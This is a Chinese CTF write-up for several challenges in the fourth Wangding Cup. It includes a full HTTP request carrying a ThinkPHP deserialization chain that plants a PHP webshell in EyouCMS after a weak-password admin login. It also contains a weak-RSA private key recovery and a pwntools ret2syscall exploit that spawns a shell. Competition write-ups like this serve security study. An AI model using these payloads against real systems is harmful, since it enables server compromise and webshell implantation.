Web
web01
访问发现为 Eyoucms
一般框架型都为历史漏洞或者最近公开一部分或者小部分的漏洞。进行检索
https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/
找到poc文章 https://cn-sec.com/archives/2640154.html
进入后台,访问 login.php?m=Admin/login 通过弱口令 admin/admin 进入后台
找到漏洞点
新建一个栏目,修改 dtype 参数为 region
保存后,再次点击编辑,编辑时,会出现一个栏目对应的 id,点击编辑保存输入 payload 进行保存修改
POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1
Host: xxx
Content-Length: 987
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Wayland like X11; FreeBSD; Linux x86_64; en-US; rv:131.0esr) Gecko/20160900 Firefox/131.0esr
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.com
Referer: http://xxxx.com/login.php?m=admin&c=Field&a=arctype_edit&id=546&lang=cn
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=2f61be676dee8f47f423fde9b3ef2e5d; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
Connection: keep-alive
title=ceshi&name=ceshi&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=xxx&old_name=ceshi&dtype[]=region
并修改对应id,提示成功后,再次访问
http://xxx.cn:45783/login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=546&_ajax=1
返回500及报错信息,则代表成功
webshell地址为 a.php617ac73525b333bea4ac35a717dd8b0a.php
flag在根目录下
wdflag{2wcsvp5uynpnxqxkpevu8k9wdds22vxb}
Web03
dirsearch 跑出来robots.txt
访问得到一个 bmp 图片以及用户+密码
得到公钥
得不到其他信息,猜测为公钥爆私钥 利用对应工具
https://github.com/RsaCtfTool/RsaCtfTool
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=
python3 RsaCtfTool.py --publickey ./a.pub --private
得到私钥
利用私钥连接 ssh
得到 flag wdflag{dtyg6g62z77ekx8ae23usuab2hgmn5qg}
PWN2
进IDA,p2中fork了一个子进程执行了p1
p1直接给了canary,但这里read没法溢出
p2这里也没有明显的利用点
但是发现了hide函数中有strcopy函数可以造成溢出,也调用了fork,看来需要劫持fork进程,让它执行这个函数拿shell
那么只要在p1中劫持fork,到hide函数中触发strcopy函数就能拿shell了
from pwn import *
io = process('./wd')
#io = remote('',)
context(log_level = 'debug',arch='amd64')
pop_rdi = 0x40213f
pop_rsi = 0x40a1ae
pop_rdx_rbx = 0x485feb
pop_rax = 0x450277
syscall = 0x41AC26
#leak canary
io.recvuntil(b": ")
canary = int(io.recvline(), 16)
io.recvline()
#jump hide
payload1 = b"a" * 0x28 + p32(1) + b"a" * 0x10
io.send(payload1)
io.recvline()
io.send(b"0")
io.recvline()
io.send(b"b" * 0x70)
io.recvline()
payload = b"a" * 0x64 + p32(0x11111111) + b"a" * 0x90 + p64(canary) + b"a" * 0x8 + p64(canary) + b"a" * 0x8
##ret2syscall
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x4c5000) + p64(pop_rdx_rbx) + p64(0x8) + p64(0) + p64(pop_rax) + p64(0) + p64(syscall)
payload += p64(pop_rdi) + p64(0x4c5000) + p64(pop_rsi) + p64(0) + p64(pop_rdx_rbx) + p64(0) + p64(0) + p64(pop_rax) + p64(0x3b) + p64(syscall)
io.send(payload)
sleep(0.8)
io.send(b"/bin/shx00")
io.interactive()
Re2
使用 jadx 反编译文件,发现一大堆加密字符串和 aes 密钥
尝试使用 aes 挨个解密密文,最终发现 flag 密文
原文始发于微信公众号(TERRA星环安全团队):第四届“网鼎杯”网络安全大赛-玄武组部分WriteUp
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论